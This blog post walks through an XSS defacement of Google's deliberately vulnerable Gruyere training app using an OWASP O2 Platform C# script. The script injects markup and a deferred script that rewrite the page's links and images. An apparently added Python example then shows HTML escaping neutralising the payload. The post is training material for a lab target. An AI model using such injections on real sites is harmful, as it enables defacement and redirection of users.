
Parsons Software Security Consulting Blog

XSS with O2 script editor: Defacement on Gruyere


Today’s post goes step by step through an XSS defacement of Gruyere.

We already created our XSS builder with O2. Now we are going to do an XSS defacement.

Above is the regular Gruyere login page. Below is the defacement after the script has executed in IE.

Here is all the code needed for the defacement.


using O2.XRules.Database.Utils;
using O2.XRules.Database.APIs;
using O2.External.SharpDevelop.Ascx;
using O2.External.SharpDevelop.ExtensionMethods;
using O2.DotNetWrappers.Network;
using O2.DotNetWrappers.DotNet;
using O2.DotNetWrappers.Windows;
using O2.DotNetWrappers.ExtensionMethods;
using O2.Views.ASCX.classes.MainGUI;
using O2.Views.ASCX.CoreControls;
using O2.Views.ASCX.ExtensionMethods;
using O2.Kernel.ExtensionMethods;
using O2.Kernel;
using O2.Interfaces;
using System.Linq;
using System.Xml.Linq;
using System.Xml;
using System.Collections.Generic;
using System.Windows.Forms;
using System.Drawing;
using System;
using O2.XRules.Database.Utils.O2;

public class DynamicType
{
    public void dynamicMethod(object returnData, System.Windows.Forms.Panel panel)
    {
        panel.clear();

        // Embed an IE (WatiN) control in the O2 panel; silent(true) suppresses pop-ups
        var ie = panel.add_IE().silent(true);
        ie.open("http://google-gruyere.appspot.com/856783677371/login");

        // Locate the DIV that carries the "Gruyere: Login" text and highlight it
        var target = ie.elements("DIV").str("Gruyere: Login");
        target.flash();

        // Inject the defacement markup immediately before that DIV.
        // The "\n" separators keep each JavaScript statement on its own line,
        // so the commented-out lines ("//...") do not swallow the statements after them.
        target.injectHtml("beforeBegin",
            "<h1>O2 Platform Demos</h1>" +
            "The best way to learn about the security vulnerabilities of this website is to use the <a href=\"http://o2platform\">OWASP O2 Platform</a>" +
            "<script DEFER>\n" +
            "//alert(document.links[0].href);\n" +
            "document.links[0].href = \"http://o2platform.com\";\n" +
            "document.images[0].src = \"http://o2platform.com/images/a/" +
            "a0/6_22_2010_7_08_23_PM_tmp9E4.jpg\";\n" +
            "//alert(document.images[0].sec);\n" +
            "//document.images[1].href = \n" +
            "//alert(document.images[1].href);\n" +
            "</script>");
    }
}

//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll
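The script above works because the markup it hands to injectHtml is inserted into the page as live HTML, which is exactly what happens server-side when an application writes untrusted input into a page without encoding it. The following Python example is added here to show that mechanism from the defender's side; it is not code from the O2 Platform or from Gruyere. It takes the page's own defacement payload (reconstructed as a constructed string) and renders it through a raw-concatenation template and through an HTML-escaped one, so you can see the script survive in the first and become inert text in the second. The function names and the rendering templates are assumptions made for this illustration.

```python
import html

# Constructed stand-in for the markup the O2 script above injects into the
# login page: a heading plus a deferred script that rewrites the first link.
# Built from the page's payload; not the O2 Platform's or Gruyere's own code.
INJECTED_MARKUP = (
    '<h1>O2 Platform Demos</h1>'
    '<script DEFER>document.links[0].href = "http://o2platform.com";</script>'
)


def render_unescaped(heading: str, untrusted: str) -> str:
    """Vulnerable pattern (hypothetical template): untrusted text is
    concatenated straight into the page, so any tags it carries become live
    DOM nodes, the same effect injectHtml("beforeBegin", ...) produces."""
    return f"<div>{heading}</div>{untrusted}"


def render_escaped(heading: str, untrusted: str) -> str:
    """Hardened pattern: the same value is HTML-escaped for element-content
    context, so '<', '>', '&' and both quote characters are emitted as text
    entities rather than markup."""
    return f"<div>{heading}</div>{html.escape(untrusted, quote=True)}"


def has_live_script(rendered: str) -> bool:
    """Check used only to make the difference visible: does a raw <script
    tag survive in the rendered output? This is not a filter to rely on;
    output encoding is the control."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    for name, render in (("unescaped", render_unescaped), ("escaped", render_escaped)):
        out = render("Gruyere: Login", INJECTED_MARKUP)
        print(f"{name:9s} live script present: {has_live_script(out)}")
        print("   ", out)
```

Run it directly and compare the two rendered strings: in the escaped version the `<script DEFER>` tag comes out as `&lt;script DEFER&gt;` and the browser shows it as text, so the link and image rewrites never run. The escaping here is for element content only; a value written into an attribute, a URL or a script block needs the encoding for that context.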

This is what Dinis created, and it is what sits under the hood of these little scripts. It’s a bit more complex.

I was speaking to Dinis, and after I questioned him about the code he explained some of it to me, in his own words:

what happens when you select the ‘show/hide generated source code’ is that you see the actual method that gets compiled (basically I automatically put the text you put on the main script window inside that public object dynamicMethod(object returnData, string testString, int testNumber) method)

– the silent(true) in IE is just to prevent pop-ups (and sometimes you need to set it to false, since you need to act on those pop-ups)

– the ‘flash()’ method is used to slow down the script execution a little bit, so that you can visually see which HTML field is being edited

If you have any questions e-mail me. Matt Parsons, CISSP, MSM

Parsons Software Security Consulting, LLC

Written by mparsons1980

November 25, 2010 at 1:39 am
